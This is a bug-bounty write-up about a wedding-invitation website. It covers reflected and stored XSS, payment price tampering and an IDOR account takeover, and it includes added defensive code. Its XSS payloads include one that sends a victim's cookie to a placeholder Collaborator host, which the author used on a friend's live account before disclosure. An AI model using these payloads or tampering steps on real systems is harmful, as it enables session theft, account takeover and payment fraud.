Hello everyone, how are you all doing? I hope each and every one of you is doing well. This article might be a bit longer than the previous ones.

It all started when I was invited to my friend's wedding through a website link. My friend had used a website that offers online invitation creation for events. I will split the explanation of the bugs I discovered into several sections:

  • XSS Reflected
  • Change Price From Parameter Tampering
  • Account Take Over
  • XSS Stored

I hope you can easily find what you're looking for within this article. The website mentioned above will be referred to as "site.com".

[Screenshot: wedding invitation website interface]

XSS Reflected

When I opened the invitation link sent by my friend, I received a URL www.site.com/my-friend-and-girl that contained the details of their wedding invitation.


Then I started to wonder: could this invitation be customized for specific individuals, with a name like "naruto", for example? Does the invitation allow personally created names like that? I immediately opened my terminal and used the tool "arjun" to check whether there were any other parameters present in that URL.

arjun -u https://site.com/my-friend-and-girl

[Screenshot: parameter discovery using the Arjun tool]

After waiting for a while, I obtained the parameters "tap, rayId, to, rxk".

I chose to use the "to" parameter, so the full URL became www.site.com/my-friend-and-girl?to=naruto. And to my surprise, the name "naruto" that I inputted appeared in the invitation.

[Screenshot]

Then I used this payload:

><img src=x onerror=alert(1)>

And I successfully executed the pop-up alert.

[Screenshot: the reflected XSS alert pop-up]

Change Price From Parameter Tampering

After obtaining the reflected XSS, I thought, why not take a little time to explore what the website has to offer? I arrived at the pricing page, which offered premium packages for users who wanted access to additional features. I attempted to purchase a premium account without any added features.

[Screenshot: premium pricing page with multiple packages]

I turned on Burp Suite, proceeded with the payment, and captured a request that looked like this.

[Screenshot: the payment request captured in Burp Suite]

The request contained the parameter "Price:124000", which I immediately changed to "Price:10". Then I forwarded the request.

[Screenshot: the modified Price parameter in Burp Suite]

Unfortunately, I didn't get what I was expecting, which was a change in the price.

[Screenshot]

I tried going back to the previous page, and this time I attempted to add another feature to my purchase.

[Screenshot: Burp Suite intercepting the payment request]

I made sure that "intercept" was on in Burp Suite and proceeded with the payment. I obtained the following request data:

[Screenshot]

Because my earlier attempt to change the initial price had not succeeded, this time I modified every "Price" parameter under the "Items" section to "10".

[Screenshot]

I found that the price had changed to well below the actual amount I was supposed to pay: it should have been "1,003,976", but it became "129,570".

[Screenshot]

Critical Finding: Successfully manipulated the payment price through parameter tampering, reducing the total from 1,003,976 to 129,570, a reduction of over 87%.
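The root cause of the price tampering above is that the server believed the "Price" values sent by the browser. The following added example (my illustration, not the site's code) contrasts that with a checkout that prices every item from a server-side catalogue; only the 124000 premium price comes from the write-up, the add-on prices and item names are constructed.

```python
# Added example: pricing items server-side instead of trusting the client.
# Only the 124000 premium price is from the write-up; the rest is constructed.
CATALOGUE = {
    "premium": 124_000,       # premium package price from the write-up
    "addon_music": 50_000,    # constructed add-on price
    "addon_gallery": 75_000,  # constructed add-on price
}

def total_from_client(items):
    """Vulnerable: sums whatever 'Price' the browser sent for each item."""
    return sum(int(item["Price"]) * int(item.get("Qty", 1)) for item in items)

def total_from_catalogue(items):
    """Hardened: the client only names items and quantities; the price is
    looked up server-side and any unknown item aborts the checkout."""
    total = 0
    for item in items:
        sku = item["Sku"]
        if sku not in CATALOGUE:
            raise ValueError(f"unknown item: {sku}")
        qty = int(item.get("Qty", 1))
        if qty < 1:
            raise ValueError("quantity must be positive")
        total += CATALOGUE[sku] * qty
    return total

def checkout(items, client_total):
    """Hardened checkout also compares the total the client displayed with the
    server's own computation; a mismatch is refused and is a good signal to
    log, because a legitimate client never disagrees with the catalogue."""
    server_total = total_from_catalogue(items)
    if int(client_total) != server_total:
        raise ValueError(f"total mismatch: client {client_total}, server {server_total}")
    return server_total

# Constructed request bodies: the honest one, and the tampered one in which
# every Price was set to 10, as in the write-up.
HONEST = [{"Sku": "premium", "Price": 124_000}, {"Sku": "addon_music", "Price": 50_000}]
TAMPERED = [{"Sku": "premium", "Price": 10}, {"Sku": "addon_music", "Price": 10}]
```

With the hardened functions the tampered body is priced exactly like the honest one, and the checkout refuses a client total of 20.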

Account Take Over

Hmm, interesting, I thought. I went back to do a deeper recon of the user dashboard section. I created a user on the website and looked at the 'Edit Profile' section.

[Screenshot: user dashboard and profile edit section]

I filled in the required data before pressing 'Update Profile', making sure that Burp Suite was running.

[Screenshot]

Looking at the request, there were several interesting parameters, namely 'id, is_admin, is_trial, is_reseller, is_premium, saldo, premium'. I tried changing all of them except the 'id' parameter, but unfortunately none of them had any effect.

I attempted to change 'id: 165309 <my first account>' to 'id: 165310 <my second account>', and it worked. The data on my second account changed to match the first account.

// Original request
id: 165309
name: "My Account"
email: "myemail@test.com"

// Modified request (Account Takeover)
id: 165310
name: "Victim Account"
email: "victim@test.com"

At this point an account could be taken over by requesting a password reset link, which the site sends to the registered WhatsApp number.

[Screenshot]

But when I returned to the dashboard, I noticed there was a password form, so I filled it in immediately and captured the following request:

[Screenshot]

I changed the 'id' parameter as I did above, and at this stage I could access someone else's account without needing to request a password reset. It was as simple as setting a new password and changing the 'id' parameter.

Critical Vulnerability: Complete account takeover possible by simply manipulating the 'id' parameter in profile update requests. This allows changing passwords of any user account.
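The fix for this class of bug is to bind the profile and password update to the authenticated session rather than to an 'id' field the client controls. The following added example (my illustration, not the site's code) shows the vulnerable handler beside the hardened one; the user records, passwords and the current-password check are constructed assumptions, and only the ids 165309 and 165310 come from the write-up.

```python
# Added example: binding a password update to the session identity.
# Users and passwords are constructed; ids 165309/165310 are from the write-up.
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256; returns salt + digest so the salt travels with it."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt + digest

def check_password(password, stored):
    """Constant-time comparison against the stored salt + digest."""
    return hmac.compare_digest(hash_password(password, stored[:16]), stored)

USERS = {
    165309: {"name": "My Account", "password": hash_password("first-account-pw")},
    165310: {"name": "Victim Account", "password": hash_password("victim-pw")},
}

def vulnerable_update_password(session_user_id, body):
    """Vulnerable: trusts the 'id' in the request body, so any logged-in user
    can set the password of any other account (the bug in the write-up).
    session_user_id is received but never used."""
    USERS[int(body["id"])]["password"] = hash_password(body["password"])
    return int(body["id"])

def hardened_update_password(session_user_id, body):
    """Hardened: the target is always the session's own user. A body 'id' that
    disagrees with the session is rejected (and worth alerting on, since a
    normal client never sends one), and the current password is re-checked."""
    if "id" in body and int(body["id"]) != session_user_id:
        raise PermissionError("id in body does not match the session user")
    user = USERS[session_user_id]
    if not check_password(body.get("current_password", ""), user["password"]):
        raise PermissionError("current password incorrect")
    user["password"] = hash_password(body["password"])
    return session_user_id
```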

XSS Stored

I used this stored XSS to steal cookies, leading to an account takeover. I found the bug while creating a free invitation on the website using the same template as my friend's. The invitation link is located at www.site.com/test-bug.

[Screenshot: creating a custom wedding invitation template]

In the music section you can customize the invitation by adding SoundCloud, and I tried inputting a simple payload.

><h1>lol</h1>

[Screenshot]

It was immediately rendered on the page. I began to wonder whether it would be stored, so I inserted an XSS payload.

><img src=x onerror=prompt(document.cookie)>

I opened my digital invitation and the XSS payload executed perfectly.

[Screenshot: stored XSS executing in the invitation]

I used Burp Collaborator as the server to receive the cookie that would be taken, with a simple payload like this.

><img src=x onerror=window.location.href='http://<burp-collaborator>/?cookie='+document.cookie>

After that, I inserted it into the music form, and asked my friend to access the invitation. Hehe.

In Burp Collaborator, I received an interaction like the one below.

[Screenshot: Burp Collaborator capturing the stolen cookie]

I immediately changed all the cookies in the browser to match the cookie I obtained.

[Screenshot]

I refreshed my browser, and I successfully gained access to my friend's account.

[Screenshot]

Successful Cookie Theft: Through stored XSS, I was able to steal session cookies and gain unauthorized access to victim accounts without their knowledge.
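Both XSS findings (the reflected "to" parameter and the stored music field) share one root cause, raw user input written into the HTML, and the cookie theft additionally relied on the session cookie being readable from JavaScript. The following added example (my illustration, not the site's code) renders both fields with output encoding so the write-up's payloads become inert text, and issues a session cookie with HttpOnly so document.cookie cannot expose it; the page template and cookie name are constructed.

```python
# Added example: output encoding for the 'to' and music fields, plus an
# HttpOnly session cookie. Template and cookie name are constructed.
import html
from http.cookies import SimpleCookie

TEMPLATE = '<p>Dear {to},</p><div class="music">{music}</div>'

def render_vulnerable(to, music):
    """Vulnerable: raw interpolation, which lets <img onerror=...> execute."""
    return TEMPLATE.format(to=to, music=music)

def render_hardened(to, music):
    """Hardened: every untrusted value is HTML-escaped at output time. For the
    music field the app should also accept only a validated SoundCloud URL
    rather than free text; escaping alone is shown here."""
    return TEMPLATE.format(to=html.escape(to, quote=True),
                           music=html.escape(music, quote=True))

def session_cookie_header(session_id):
    """HttpOnly keeps the session id out of document.cookie, so the stored-XSS
    exfiltration in the write-up would not have leaked it even though the
    script still ran; Secure and SameSite narrow the remaining blast radius."""
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Lax"
    c["session"]["path"] = "/"
    return c.output(header="").strip()

# The two payloads from the write-up, as constructed inputs.
REFLECTED = "><img src=x onerror=alert(1)>"
STORED = "><img src=x onerror=prompt(document.cookie)>"
```

Escaping does not stop the script from being stored, it only stops it from being interpreted as markup; HttpOnly is the separate control that protects the cookie when an escaping gap is missed elsewhere.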

Responsible Disclosure and Resolution

I reported it and, unexpectedly, received a reward for my report. I requested permission to write this article, and they granted it.

Note: I obtained permission, but they asked me to use the browser's inspect element to modify the data shown in the screenshots where needed, because they did not want any sensitive user data or company data to be published accidentally. The way I found the bugs is exactly as I reported it, but they asked me to use new screenshots taken after they had patched their system.

Impact Summary

The vulnerabilities discovered had significant security implications:

  • XSS Reflected: Allowed for client-side attacks and potential session hijacking
  • Price Manipulation: Financial impact with ability to purchase premium features at drastically reduced prices
  • Account Takeover: Complete compromise of user accounts through parameter manipulation
  • XSS Stored: Persistent attacks affecting all users who view the malicious invitation

Conclusion

This case demonstrates how a simple wedding invitation website can harbor multiple critical vulnerabilities. The combination of inadequate input validation, improper access controls, and insufficient parameter verification created a perfect storm for security exploitation.

That's all from me; hopefully it can serve as a reference for you. I'm RyuuKhagetsu, see you in the next article.